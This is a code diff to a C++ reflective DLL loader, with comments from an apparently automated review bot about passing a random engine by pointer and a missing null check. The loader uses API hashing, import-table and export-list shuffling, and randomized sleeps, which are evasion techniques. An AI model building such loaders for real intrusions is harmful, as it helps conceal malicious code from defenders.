diff --git a/reflective_loader/loader.cpp b/reflective_loader/loader.cpp
index 6bfe37e..de53c71 100644
--- a/reflective_loader/loader.cpp
+++ b/reflective_loader/loader.cpp
@@ -20,12 +20,12 @@ void Load(PBYTE pImage, DWORD dwFunctionHash, PVOID pvUserData, DWORD dwUserData
     std::random_device rd;
     std::mt19937 eng(rd());
 
-    auto pLoadLibraryW = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, LOAD_LIBRARY_W_HASH, eng));
-    auto pGetProcAddress = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, GET_PROC_ADDRESS_HASH, eng));
-    auto pVirtualAlloc = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_ALLOC_HASH, eng));
-    auto pFlushInstructionCache = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, FLUSH_INSTRUCTION_CACHE_HASH, eng));
-    auto pVirtualProtect = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_PROTECT_HASH, eng));
-    auto pSleep = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, SLEEP_HASH, eng));
+    auto pLoadLibraryW = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, LOAD_LIBRARY_W_HASH, &eng));
+    auto pGetProcAddress = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, GET_PROC_ADDRESS_HASH, &eng));
+    auto pVirtualAlloc = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_ALLOC_HASH, &eng));
+    auto pFlushInstructionCache = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, FLUSH_INSTRUCTION_CACHE_HASH, &eng));
+    auto pVirtualProtect = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, VIRTUAL_PROTECT_HASH, &eng));
+    auto pSleep = reinterpret_cast(GetExportAddrFromHash(pbKernel32Dll, SLEEP_HASH, &eng));
 
     if (pLoadLibraryW == nullptr || pGetProcAddress == nullptr || pVirtualAlloc == nullptr || pFlushInstructionCache == nullptr || pVirtualProtect == nullptr || pSleep == nullptr) {
         return;
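Review bot: Changing the generator parameter from `const std::mt19937 &` to `std::mt19937 *` does resolve the const problem (the distribution and `std::shuffle` calls need a mutable engine), but it introduces a nullable parameter that `GetExportAddrFromHash` and `PatchImportAddressTable` dereference unchecked at `distr(*eng)`, `sleepDist(*eng)` and `std::shuffle(..., *eng)`. A non-const reference, `std::mt19937 &eng`, states the same requirement with no null state, and the six call sites in this hunk, as well as those in the `-80` and `-102` hunks, would then keep passing `eng` instead of `&eng`. The same applies to the two signature hunks at `-160` and `-330` and to the matching declarations in loader.hpp. The enclosing function `Load` begins before this hunk.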
@@ -80,7 +80,7 @@ void Load(PBYTE pImage, DWORD dwFunctionHash, PVOID pvUserData, DWORD dwUserData
         4.) Resolve the imports by patching the Import Address Table (IAT)
     */
 
-    if (!PatchImportAddressTable(pNewImageBase, pDataDir, pLoadLibraryW, pGetProcAddress, pSleep, eng)) {
+    if (!PatchImportAddressTable(pNewImageBase, pDataDir, pLoadLibraryW, pGetProcAddress, pSleep, &eng)) {
         return;
     }
 
@@ -102,7 +102,7 @@ void Load(PBYTE pImage, DWORD dwFunctionHash, PVOID pvUserData, DWORD dwUserData
     } else {
         // Execute user defined function
         auto pbNewImageBase = reinterpret_cast(pNewImageBase);
-        auto pUserFunction = reinterpret_cast(GetExportAddrFromHash(pbNewImageBase, dwFunctionHash, eng));
+        auto pUserFunction = reinterpret_cast(GetExportAddrFromHash(pbNewImageBase, dwFunctionHash, &eng));
         pUserFunction(pvUserData, dwUserDataLen);
     }
 }
@@ -160,7 +160,7 @@ void FinalizeRelocations(ULONG_PTR pNewImageBase, PIMAGE_NT_HEADERS64 pNtHeaders
     pFlushInstructionCache(INVALID_HANDLE_VALUE, nullptr, 0);
 }
 
-BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, const std::mt19937 &eng) {
+BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, std::mt19937 *eng) {
     auto pImportDescriptor = reinterpret_cast(pNewImageBase + pDataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);
 
     if (pImportDescriptor == nullptr) {
@@ -188,7 +188,7 @@ BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDat
     if (importCount > 1 && OBFUSCATE_IMPORTS) {
         for (auto i = 0; i < importCount - 1; i++) {
             std::uniform_int_distribution<> distr(i, importCount - 1);
-            int j = distr(eng);
+            int j = distr(*eng);
 
             // Swap
             auto tmp = pImportDescriptor[i];
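Review bot: In the `-102` hunk `pUserFunction` is called on the line after the lookup without a null check, although `GetExportAddrFromHash` appears to return nullptr on a failed lookup (its results from the kernel32 lookups in the `-20` hunk are all checked against nullptr before use), so a missing or mis-hashed export would call through a null pointer. Mirroring the existing guard, `if (pUserFunction == nullptr) { return; }` before the call keeps the failure path consistent with the rest of `Load`. The enclosing function begins before this hunk.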
@@ -196,7 +196,7 @@ BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDat
             pImportDescriptor[j] = tmp;
 
             // Store unique sleep durations with their corresponding import index
-            auto sleepTime = sleepDist(eng);
+            auto sleepTime = sleepDist(*eng);
             sleepDurations.push_back(std::make_pair(i, sleepTime));
         }
     }
@@ -330,7 +330,7 @@ PBYTE GetModuleAddressFromHash(DWORD dwHash) {
     return nullptr;
 }
 
-HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, const std::mt19937 &eng) {
+HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, std::mt19937 *eng) {
     auto pNtHeaders = GetNtHeaders(pbModule);
 
     if (pNtHeaders == nullptr) {
@@ -354,7 +354,7 @@ HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, const std::mt19937 &
         vNameRvas.push_back(std::make_tuple(dwNameRva, i));
     }
 
-    std::shuffle(vNameRvas.begin(), vNameRvas.end(), eng);
+    std::shuffle(vNameRvas.begin(), vNameRvas.end(), *eng);
 
     DWORD dwNameHash, dwFunctionRva;
     UNICODE_STRING *strFunctionNameBase;
diff --git a/reflective_loader/loader.hpp b/reflective_loader/loader.hpp
index 06fa7ce..2e55618 100644
--- a/reflective_loader/loader.hpp
+++ b/reflective_loader/loader.hpp
@@ -62,10 +62,10 @@ using IMAGE_RELOC = _IMAGE_RELOC;
 using PIMAGE_RELOC = _IMAGE_RELOC *;
 
 PBYTE GetModuleAddressFromHash(DWORD dwHash);
-HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, const std::mt19937 &eng);
+HMODULE GetExportAddrFromHash(PBYTE pbModule, DWORD dwHash, std::mt19937 *eng);
 PIMAGE_NT_HEADERS64 GetNtHeaders(PBYTE pbImage);
 void CopyHeadersAndSections(ULONG_PTR pNewImageBase, PBYTE pbImage, PIMAGE_NT_HEADERS64 pNtHeaders);
 BOOL ProcessRelocations(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, ULONG_PTR ulpDelta);
-BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, const std::mt19937 &eng);
+BOOL PatchImportAddressTable(ULONG_PTR pNewImageBase, PIMAGE_DATA_DIRECTORY pDataDirectory, LOAD_LIBRARY_W pLoadLibraryW, GET_PROC_ADDRESS pGetProcAddress, SLEEP pSleep, std::mt19937 *eng);
 void FinalizeRelocations(ULONG_PTR pNewImageBase, PIMAGE_NT_HEADERS64 pNtHeaders, VIRTUAL_PROTECT pVirtualProtect, FLUSH_INSTRUCTION_CACHE pFlushInstructionCache);